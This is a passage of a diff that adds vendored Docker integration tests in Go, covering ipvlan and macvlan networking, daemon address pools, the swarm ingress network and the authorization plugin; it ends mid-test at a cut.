assert.Check(t, strings.Contains(result.Combined(), "default dev eth0")) + // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops + result, err = container.Exec(ctx, client, id2, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default dev eth0")) + } +} + +// ensure Kernel version is >= v4.2 for ipvlan support +func ipvlanKernelSupport() bool { + return n.CheckKernelMajorVersionGreaterOrEqualThen(4, 2) +} diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go new file mode 100644 index 0000000000..2d5f62453c --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go @@ -0,0 +1,33 @@ +package ipvlan // import "github.com/docker/docker/integration/network/ipvlan" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go new file mode 100644 index 0000000000..14dfce92cb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go @@ -0,0 +1,282 @@ +package macvlan + +import ( + "context" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + net "github.com/docker/docker/integration/internal/network" + n "github.com/docker/docker/integration/network" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDockerNetworkMacvlanPersistance(t *testing.T) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support macvlan") + + d := daemon.New(t) + d.StartWithBusybox(t) + defer d.Stop(t) + + master := "dm-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + client, err := d.NewClient() + assert.NilError(t, err) + + netName := "dm-persist" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan("dm-dummy0.60"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + d.Restart(t) + assert.Check(t, n.IsNetworkAvailable(client, netName)) +} + +func TestDockerNetworkMacvlan(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support macvlan") + + for _, tc := range []struct { + name string + test func(client.APIClient) func(*testing.T) + }{ + { + name: "Subinterface", + test: testMacvlanSubinterface, + }, { + name: "OverlapParent", + test: testMacvlanOverlapParent, + }, { + name: "NilParent", + test: testMacvlanNilParent, + }, { + name: "InternalMode", + test: testMacvlanInternalMode, + }, { + name: "Addressing", + test: testMacvlanAddressing, + }, + } { + d := daemon.New(t) + d.StartWithBusybox(t) + + client, err := d.NewClient() + assert.NilError(t, err) + + t.Run(tc.name, tc.test(client)) + + d.Stop(t) + // FIXME(vdemeester) clean network + } +} + +func testMacvlanOverlapParent(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "dm-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + netName := "dm-subinterface" + parentName := "dm-dummy0.40" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(parentName), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + _, err := net.Create(context.Background(), client, "dm-parent-net-overlap", + net.WithMacvlan(parentName), + ) + assert.Check(t, err != nil) + + // delete the network while preserving the parent link + err = client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, master) + } +} + +func testMacvlanSubinterface(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "dm-dummy0" + parentName := "dm-dummy0.20" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + n.CreateVlanInterface(t, master, parentName, "20") + + netName := "dm-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(parentName), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // delete the network while preserving the parent link + err := client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, parentName) + } +} + +func testMacvlanNilParent(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + _, err := client.NetworkCreate(context.Background(), "dm-nil-parent", types.NetworkCreate{ + Driver: "macvlan", + }) + assert.NilError(t, err) + assert.Check(t, n.IsNetworkAvailable(client, "dm-nil-parent")) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent")) + id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent")) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.Check(t, err == nil) + } +} + +func testMacvlanInternalMode(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + _, err := client.NetworkCreate(context.Background(), "dm-internal", types.NetworkCreate{ + Driver: "macvlan", + Internal: true, + }) + assert.NilError(t, err) + assert.Check(t, n.IsNetworkAvailable(client, "dm-internal")) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal")) + id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal")) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err = container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // FIXME(vdemeester) check the time of error ? + assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.Check(t, err == nil) + } +} + +func testMacvlanMultiSubnet(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackbridge" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(""), + net.WithIPv6(), + net.WithIPAM("172.28.100.0/24", ""), + net.WithIPAM("172.28.102.0/24", "172.28.102.254"), + net.WithIPAM("2001:db8:abc2::/64", ""), + net.WithIPAM("2001:db8:abc4::/64", "2001:db8:abc4::254"), + ) + + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.100.20"), + container.WithIPv6("dualstackbridge", "2001:db8:abc2::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.100.21"), + container.WithIPv6("dualstackbridge", "2001:db8:abc2::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.102.20"), + container.WithIPv6("dualstackbridge", "2001:db8:abc4::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + container.WithIPv4("dualstackbridge", "172.28.102.21"), + container.WithIPv6("dualstackbridge", "2001:db8:abc4::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.100.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8:abc2::1") + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.102.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8.abc4::254") + } +} + +func testMacvlanAddressing(client client.APIClient) func(*testing.T) { + return func(t *testing.T) { + // Ensure the default gateways, next-hops and default dev devices are properly set + netName := "dualstackbridge" + net.CreateNoError(t, context.Background(), client, netName, + net.WithMacvlan(""), + net.WithIPv6(), + net.WithOption("macvlan_mode", "bridge"), + net.WithIPAM("172.28.130.0/24", ""), + net.WithIPAM("2001:db8:abca::/64", "2001:db8:abca::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode("dualstackbridge"), + ) + + // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet + result, err := container.Exec(ctx, client, id1, []string{"ip", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.130.1 dev eth0")) + // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop + result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 2001:db8:abca::254 dev eth0")) + } +} + +// ensure Kernel version is >= v3.9 for macvlan support +func macvlanKernelSupport() bool { + return n.CheckKernelMajorVersionGreaterOrEqualThen(3, 9) +} diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go new file mode 100644 index 0000000000..31cf111b22 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go @@ -0,0 +1,33 @@ +package macvlan // import "github.com/docker/docker/integration/network/macvlan" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/main_test.go b/vendor/github.com/docker/docker/integration/network/main_test.go new file mode 100644 index 0000000000..36ed19ca67 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/main_test.go @@ -0,0 +1,33 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/network/service_test.go b/vendor/github.com/docker/docker/integration/network/service_test.go new file mode 100644 index 0000000000..d926045b72 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/service_test.go @@ -0,0 +1,315 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/icmd" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// delInterface removes given network interface +func delInterface(t *testing.T, ifName string) { + icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success) +} + +func TestDaemonRestartWithLiveRestore(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + d := daemon.New(t) + defer d.Stop(t) + d.Start(t) + d.Restart(t, "--live-restore=true", + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{}) + assert.NilError(t, err) + // Make sure docker0 doesn't get override with new IP in live restore case + assert.Equal(t, out.IPAM.Config[0].Subnet, "172.18.0.0/16") +} + +func TestDaemonDefaultNetworkPools(t *testing.T) { + // Remove docker0 bridge and the start daemon defining the predefined address pools + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + delInterface(t, defaultNetworkBridge) + d := daemon.New(t) + defer d.Stop(t) + d.Start(t, + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.30.0.0/16") + + // Create a bridge network and verify its subnet is the second default pool + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.0.0/24") + + // Create a bridge network and verify its subnet is the third default pool + name = "saanvi" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.1.0/24") + delInterface(t, defaultNetworkBridge) + +} + +func TestDaemonRestartWithExistingNetwork(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := daemon.New(t) + d.Start(t) + defer d.Stop(t) + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + + // Create a bridge network + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip := out.IPAM.Config[0].Subnet + + // Restart daemon with default address pool option + d.Restart(t, + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + assert.Equal(t, out1.IPAM.Config[0].Subnet, networkip) + delInterface(t, defaultNetworkBridge) +} + +func TestDaemonRestartWithExistingNetworkWithDefaultPoolRange(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := daemon.New(t) + d.Start(t) + defer d.Stop(t) + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + + // Create a bridge network + name := "elango" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip := out.IPAM.Config[0].Subnet + + // Create a bridge network + name = "sthira" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + networkip2 := out.IPAM.Config[0].Subnet + + // Restart daemon with default address pool option + d.Restart(t, + "--default-address-pool", "base=175.18.0.0/16,size=16", + "--default-address-pool", "base=175.19.0.0/16,size=24") + + // Create a bridge network + name = "saanvi" + network.CreateNoError(t, context.Background(), cli, name, + network.WithDriver("bridge"), + ) + out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{}) + assert.NilError(t, err) + + assert.Check(t, out1.IPAM.Config[0].Subnet != networkip) + assert.Check(t, out1.IPAM.Config[0].Subnet != networkip2) + delInterface(t, defaultNetworkBridge) +} + +func TestDaemonWithBipAndDefaultNetworkPool(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature") + defaultNetworkBridge := "docker0" + d := daemon.New(t) + defer d.Stop(t) + d.Start(t, "--bip=172.60.0.1/16", + "--default-address-pool", "base=175.30.0.0/16,size=16", + "--default-address-pool", "base=175.33.0.0/16,size=24") + + // Verify bridge network's subnet + cli, err := d.NewClient() + assert.Assert(t, err) + defer cli.Close() + out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{}) + assert.NilError(t, err) + // Make sure BIP IP doesn't get override with new default address pool . + assert.Equal(t, out.IPAM.Config[0].Subnet, "172.60.0.1/16") + delInterface(t, defaultNetworkBridge) +} + +func TestServiceWithPredefinedNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + hostName := "host" + var instances uint64 = 1 + serviceName := "TestService" + t.Name() + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(hostName), + ) + + poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) +} + +const ingressNet = "ingress" + +func TestServiceRemoveKeepsIngressNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + poll.WaitOn(t, swarmIngressReady(client), swarm.NetworkPoll) + + var instances uint64 = 1 + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(t.Name()+"-service"), + swarm.ServiceWithEndpoint(&swarmtypes.EndpointSpec{ + Ports: []swarmtypes.PortConfig{ + { + Protocol: swarmtypes.PortConfigProtocolTCP, + TargetPort: 80, + PublishMode: swarmtypes.PortConfigPublishModeIngress, + }, + }, + }), + ) + + poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noServices(client), swarm.ServicePoll) + + // Ensure that "ingress" is not removed or corrupted + time.Sleep(10 * time.Second) + netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + assert.NilError(t, err, "Ingress network was removed after removing service!") + assert.Assert(t, len(netInfo.Containers) != 0, "No load balancing endpoints in ingress network") + assert.Assert(t, len(netInfo.Peers) != 0, "No peers (including self) in ingress network") + _, ok := netInfo.Containers["ingress-sbox"] + assert.Assert(t, ok, "ingress-sbox not present in ingress network") +} + +func serviceRunningCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + services, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + if err != nil { + return poll.Error(err) + } + + if len(services) != int(instances) { + return poll.Continue("Service count at %d waiting for %d", len(services), instances) + } + return poll.Success() + } +} + +func swarmIngressReady(client client.NetworkAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + if err != nil { + return poll.Error(err) + } + np := len(netInfo.Peers) + nc := len(netInfo.Containers) + if np == 0 || nc == 0 { + return poll.Continue("ingress not ready: %d peers and %d containers", nc, np) + } + _, ok := netInfo.Containers["ingress-sbox"] + if !ok { + return poll.Continue("ingress not ready: does not contain the ingress-sbox") + } + return poll.Success() + } +} + +func noServices(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + services, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + switch { + case err != nil: + return poll.Error(err) + case len(services) == 0: + return poll.Success() + default: + return poll.Continue("Service count at %d waiting for 0", len(services)) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go new file mode 100644 index 0000000000..105affc1af --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go @@ -0,0 +1,521 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httputil" + "net/url" + "os" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/authorization" + "gotest.tools/assert" + "gotest.tools/skip" +) + +const ( + testAuthZPlugin = "authzplugin" + unauthorizedMessage = "User unauthorized authz plugin" + errorMessage = "something went wrong..." + serverVersionAPI = "/version" +) + +var ( + alwaysAllowed = []string{"/_ping", "/info"} + ctrl *authorizationController +) + +type authorizationController struct { + reqRes authorization.Response // reqRes holds the plugin response to the initial client request + resRes authorization.Response // resRes holds the plugin response to the daemon response + versionReqCount int // versionReqCount counts the number of requests to the server version API endpoint + versionResCount int // versionResCount counts the number of responses from the server version API endpoint + requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller + reqUser string + resUser string +} + +func setupTestV1(t *testing.T) func() { + ctrl = &authorizationController{} + teardown := setupTest(t) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + assert.NilError(t, err) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) + err = ioutil.WriteFile(fileName, []byte(server.URL), 0644) + assert.NilError(t, err) + + return func() { + err := os.RemoveAll("/etc/docker/plugins") + assert.NilError(t, err) + + teardown() + ctrl = nil + } +} + +// check for always allowed endpoints to not inhibit test framework functions +func isAllowed(reqURI string) bool { + for _, endpoint := range alwaysAllowed { + if strings.HasSuffix(reqURI, endpoint) { + return true + } + } + return false +} + +func TestAuthZPluginAllowRequest(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + // Ensure command successful + cID := container.Run(t, ctx, client) + + assertURIRecorded(t, ctrl.requestsURIs, "/containers/create") + assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID)) + + _, err = client.ServerVersion(ctx) + assert.NilError(t, err) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) +} + +func TestAuthZPluginTLS(t *testing.T) { + defer setupTestV1(t)() + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + cacertPath = "../../testdata/https/ca.pem" + serverCertPath = "../../testdata/https/server-cert.pem" + serverKeyPath = "../../testdata/https/server-key.pem" + clientCertPath = "../../testdata/https/client-cert.pem" + clientKeyPath = "../../testdata/https/client-key.pem" + ) + + d.Start(t, + "--authorization-plugin="+testAuthZPlugin, + "--tlsverify", + "--tlscacert", cacertPath, + "--tlscert", serverCertPath, + "--tlskey", serverKeyPath, + "-H", testDaemonHTTPSAddr) + + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + + client, err := newTLSAPIClient(testDaemonHTTPSAddr, cacertPath, clientCertPath, clientKeyPath) + assert.NilError(t, err) + + _, err = client.ServerVersion(context.Background()) + assert.NilError(t, err) + + assert.Equal(t, "client", ctrl.reqUser) + assert.Equal(t, "client", ctrl.resUser) +} + +func newTLSAPIClient(host, cacertPath, certPath, keyPath string) (client.APIClient, error) { + dialer := &net.Dialer{ + KeepAlive: 30 * time.Second, + Timeout: 30 * time.Second, + } + return client.NewClientWithOpts( + client.WithTLSClientConfig(cacertPath, certPath, keyPath), + client.WithDialer(dialer), + client.WithHost(host)) +} + +func TestAuthZPluginDenyRequest(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = false + ctrl.reqRes.Msg = unauthorizedMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 0, ctrl.versionResCount) + + // Ensure unauthorized message appears in response + assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error()) +} + +// TestAuthZPluginAPIDenyResponse validates that when authorization +// plugin deny the request, the status code is forbidden +func TestAuthZPluginAPIDenyResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = false + ctrl.resRes.Msg = unauthorizedMessage + + daemonURL, err := url.Parse(d.Sock()) + assert.NilError(t, err) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + assert.NilError(t, err) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + assert.NilError(t, err) + resp, err := client.Do(req) + + assert.NilError(t, err) + assert.DeepEqual(t, http.StatusForbidden, resp.StatusCode) +} + +func TestAuthZPluginDenyResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = false + ctrl.resRes.Msg = unauthorizedMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) + + // Ensure unauthorized message appears in response + assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error()) +} + +// TestAuthZPluginAllowEventStream verifies event stream propagates +// correctly after request pass through by the authorization plugin +func TestAuthZPluginAllowEventStream(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + startTime := strconv.FormatInt(systemTime(t, client, testEnv).Unix(), 10) + events, errs, cancel := systemEventsSince(client, startTime) + defer cancel() + + // Create a container and wait for the creation events + cID := container.Run(t, ctx, client) + + for i := 0; i < 100; i++ { + c, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + if c.State.Running { + break + } + if i == 99 { + t.Fatal("Container didn't run within 10s") + } + time.Sleep(100 * time.Millisecond) + } + + created := false + started := false + for !created && !started { + select { + case event := <-events: + if 